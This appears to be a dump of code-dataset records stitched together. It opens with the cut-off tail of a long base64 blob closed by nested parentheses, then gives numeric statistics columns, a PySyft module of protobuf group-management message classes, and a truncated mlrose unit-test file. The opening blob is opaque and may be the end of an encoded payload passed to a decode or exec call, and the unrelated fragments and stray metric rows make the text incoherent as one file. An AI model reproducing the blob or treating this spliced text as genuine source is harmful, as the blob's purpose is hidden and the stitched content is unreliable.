bzx6uJPv52LK1+R7LU7VjqaaNur8yYG0gHaVlU0I2VORaCDAW/77p8ePtI2njzfu/5OXWG2AfbLDqZ/ZKr8e32txvtLBwktETjX5UDaSdtPfCL5mR4PeN89NhzsYp6br1EzBvC0HzbzGOniT7+dm0jn1723/zgvg0Um7viC3h4+K4nd3lu8fR2ccZ2Tnw+W8WOzUdmJjetlc0fOt5b5U7PR2Yu/ls+nR7VR+qdiZl2g7iuLTm8SD2Ca37nT9vcn3GW4McIfpkRvDsGfzkZAfB2G3c8M9sDmCtAfvhL8jq89g64OTopcM8CPMAPUROP3Blui2N8OcB3bBNRccifiBsSpkuuHuvermHG1kYM0DY3N+OA7CIdBF1rwowAvnS6hyPh9eZosrclGpeuoVcSsPigTJwAXOd+HitVvfEUXBtk5buS7ed9ESV/2893pRIOtGZG4F6B6BTFn9106QtQMs2gs38Q/cAM7qILkg4AMWP7E6SdWPdBvc01c5Zrr7h8Xdb6s54MCvvBC/IvEPCvwuoPcg/ueu1b/tBH8XyXVLz3qlozFT4AjoXgAxQPdxwIEtgFWUp0rA3JLtTsBYqQbqlW0Aqwj4uetFgJ+7JOD3EPD3CHg/Av7evfrvN3B4h3Q4ar0WlBYJbmORA8TqAaPw6gA9+KPb5aDnRXY56LleHLV/870k10eoJg6xu0huN1rkkM02hBYRCdqwM0HTGgnUvDyvL5y246C9O2LyMol5TnTShBPs/MaTPy9ouAue51mXdkIzfw4JTqFklC1NBEqV3WWZsKAj6aMzlGUMysIhE47FoZERfEdKq2aQvxejGcvAmMtbcL475k1eDp8zCiXM686uavObE4oFdfhC1lqppLkCMolYxgZMH8To8RwkhmV1+KMCJ/hI0SxazyxDI4xWTdj1ZSa18fQPAnt9S7Bf8U+uJD65csK2wpfr3Apd0gpFw9JuGJUiPYQIpoTFxMu+nAWbYLZkm6ogNhhhK7sSgYTQDKOHuJn6WquF/79qVgpnnRazTptnt8wyBtvYmNM70BABxxRKZWaaW701hLfIQyMjIyh8RgifMROvILwZzitM5bWnGvlx00OENH+ImxAuAi5Ho2nt26/Hv/063C/T9rJ+ZzFbLFUshJtMIvZr6EDQCIky0ynm/AII8nEwrAhgMK8vs1JezzBxYyDu4A2TITNfdEUckxHLG2nbXjiUVgol056nVEYCDGi12TxgQvEPVauchJWQ7JIJqL3OslYY/8MJKmZWjGxGzHwDZmuzCQQD2HQs01hmsKRYip++iQkrkjewXEa7mLp4pbemsmP89Q3Uf4epq1fpcA8qbmVQ6VW6lE4sg/yjKj0uN090O72yF3o6mkbsUXCEZ9Al+bta9TdJgM+urWN8XrhHAfCLi+CBxcXwbmLf+iRB/+QkFBFpSWFYTOADdRPjPVGvtHPeMErJYVnTK9ZKcgAGQDRM/kxaLY7lWTSLPX9RLzA+f91yTSkHDDlZMGglz07j/7Ov8CLQftET2BdU/N7AcMAf6PYrPgToB/PyDwCVn4ArqAR8gbZAj08RHxjn93pd9Y8nsNCh/B9lmUdh"))))
| 768.8
| 3,710
| 0.960198
| 129
| 3,844
| 28.612403
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151175
| 0.003642
| 3,844
| 5
| 3,710
| 768.8
| 0.812533
| 0.026275
| 0
| 0
| 0
| 0.5
| 0.97621
| 0.97621
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
86ab5a93676c8914c9bbe42e3bdb8eb553bc62cd
| 30,928
|
py
|
Python
|
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | null | null | null |
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | 3
|
2021-11-17T15:34:03.000Z
|
2021-12-08T14:39:10.000Z
|
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | null | null | null |
# stdlib
import json
from typing import Dict
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from typing_extensions import final
# relative
from ...... import serialize
from ......proto.grid.messages.group_messages_pb2 import (
CreateGroupMessage as CreateGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
CreateGroupResponse as CreateGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
DeleteGroupMessage as DeleteGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
DeleteGroupResponse as DeleteGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupMessage as GetGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupResponse as GetGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupsMessage as GetGroupsMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupsResponse as GetGroupsResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
UpdateGroupMessage as UpdateGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
UpdateGroupResponse as UpdateGroupResponse_PB,
)
from .....common.message import ImmediateSyftMessageWithReply
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.deserialize import _deserialize
from .....common.serde.serializable import serializable
from .....common.uid import UID
from .....io.address import Address
@serializable()
@final
class CreateGroupMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> CreateGroupMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: CreateGroupMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateGroupMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: CreateGroupMessage_PB,
) -> "CreateGroupMessage":
"""Creates a CreateGroupMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: CreateGroupMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateGroupMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateGroupMessage_PB
@serializable()
@final
class CreateGroupResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> CreateGroupResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateGroupResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: CreateGroupResponse_PB,
) -> "CreateGroupResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateGroupResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateGroupResponse_PB
@serializable()
@final
class GetGroupMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> GetGroupMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetGroupMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetGroupMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetGroupMessage_PB,
) -> "GetGroupMessage":
"""Creates a GetGroupMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: GetGroupMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetGroupMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetGroupMessage_PB
@serializable()
@final
class GetGroupResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> GetGroupResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetGroupResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: GetGroupResponse_PB,
) -> "GetGroupResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetGroupResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetGroupResponse_PB
@serializable()
@final
class GetGroupsMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> GetGroupsMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetGroupsMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetGroupsMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetGroupsMessage_PB,
) -> "GetGroupsMessage":
"""Creates a GetGroupsMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: GetGroupsMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetGroupsMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetGroupsMessage_PB
@serializable()
@final
class GetGroupsResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: List,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> GetGroupsResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetGroupsResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: GetGroupsResponse_PB,
) -> "GetGroupsResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetGroupsResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetGroupsResponse_PB
@serializable()
@final
class UpdateGroupMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> UpdateGroupMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: UpdateGroupMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateGroupMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: UpdateGroupMessage_PB,
) -> "UpdateGroupMessage":
"""Creates a UpdateGroupMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: UpdateGroupMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateGroupMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateGroupMessage_PB
@serializable()
@final
class UpdateGroupResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> UpdateGroupResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateGroupResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: UpdateGroupResponse_PB,
) -> "UpdateGroupResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateGroupResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateGroupResponse_PB
@serializable()
@final
class DeleteGroupMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> DeleteGroupMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: DeleteGroupMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteGroupMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: DeleteGroupMessage_PB,
) -> "DeleteGroupMessage":
"""Creates a DeleteGroupMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: DeleteGroupMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteGroupMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteGroupMessage_PB
@serializable()
@final
class DeleteGroupResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> DeleteGroupResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: SignalingOfferMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteGroupResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: DeleteGroupResponse_PB,
) -> "DeleteGroupResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
:return: returns an instance of SignalingOfferMessage
:rtype: SignalingOfferMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteGroupResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteGroupResponse_PB
| 40.481675
| 92
| 0.672691
| 3,584
| 30,928
| 5.705357
| 0.041295
| 0.034233
| 0.017606
| 0.015649
| 0.872408
| 0.872408
| 0.872408
| 0.872408
| 0.870305
| 0.850499
| 0
| 0.001327
| 0.269303
| 30,928
| 763
| 93
| 40.534731
| 0.903491
| 0.500129
| 0
| 0.663043
| 1
| 0
| 0.013506
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.0625
| 0
| 0.279891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86beca144c140da8f6f25005bcd608c13261fa37
| 28,310
|
py
|
Python
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 63
|
2019-09-24T14:09:51.000Z
|
2022-03-09T02:36:25.000Z
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 6
|
2019-10-04T01:04:21.000Z
|
2021-08-31T19:06:13.000Z
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 104
|
2019-09-23T22:44:43.000Z
|
2022-03-13T18:50:53.000Z
|
""" Unit tests for opt_probs.py"""
# Author: Genevieve Hayes
# License: BSD 3 clause
try:
import mlrose_hiive
except:
import sys
sys.path.append("..")
import unittest
import numpy as np
from mlrose_hiive import OneMax, DiscreteOpt, ContinuousOpt, TSPOpt, OnePointCrossOver
# The following functions/classes are not automatically imported at
# initialization, so must be imported explicitly from neural.py,
# activation.py and opt_probs.py
from mlrose_hiive.neural import NetworkWeights
from mlrose_hiive.neural.activation import identity
from mlrose_hiive.opt_probs._opt_prob import _OptProb as OptProb
class TestOptProb(unittest.TestCase):
"""Tests for _OptProb class."""
@staticmethod
def test_set_state_max():
"""Test set_state method for a maximization problem"""
problem = OptProb(5, OneMax(), maximize=True)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
assert (np.array_equal(problem.get_state(), x)
and problem.get_fitness() == 10)
@staticmethod
def test_set_state_min():
"""Test set_state method for a minimization problem"""
problem = OptProb(5, OneMax(), maximize=False)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
assert (np.array_equal(problem.get_state(), x)
and problem.get_fitness() == -10)
@staticmethod
def test_set_population_max():
"""Test set_population method for a maximization problem"""
problem = OptProb(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
pop_fit = np.array([1, 3, 4, 2, 100, 0, 5, -50])
problem.set_population(pop)
assert (np.array_equal(problem.get_population(), pop)
and np.array_equal(problem.get_pop_fitness(), pop_fit))
@staticmethod
def test_set_population_min():
"""Test set_population method for a minimization problem"""
problem = OptProb(5, OneMax(), maximize=False)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
pop_fit = -1.0*np.array([1, 3, 4, 2, 100, 0, 5, -50])
problem.set_population(pop)
assert (np.array_equal(problem.get_population(), pop)
and np.array_equal(problem.get_pop_fitness(), pop_fit))
@staticmethod
def test_best_child_max():
"""Test best_child method for a maximization problem"""
problem = OptProb(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.set_population(pop)
x = problem.best_child()
assert np.array_equal(x, np.array([100, 0, 0, 0, 0]))
@staticmethod
def test_best_child_min():
"""Test best_child method for a minimization problem"""
problem = OptProb(5, OneMax(), maximize=False)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.set_population(pop)
x = problem.best_child()
assert np.array_equal(x, np.array([0, 0, 0, 0, -50]))
@staticmethod
def test_best_neighbor_max():
"""Test best_neighbor method for a maximization problem"""
problem = OptProb(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.neighbors = pop
x = problem.best_neighbor()
assert np.array_equal(x, np.array([100, 0, 0, 0, 0]))
@staticmethod
def test_best_neighbor_min():
"""Test best_neighbor method for a minimization problem"""
problem = OptProb(5, OneMax(), maximize=False)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.neighbors = pop
x = problem.best_neighbor()
assert np.array_equal(x, np.array([0, 0, 0, 0, -50]))
@staticmethod
def test_eval_fitness_max():
"""Test eval_fitness method for a maximization problem"""
problem = OptProb(5, OneMax(), maximize=True)
x = np.array([0, 1, 2, 3, 4])
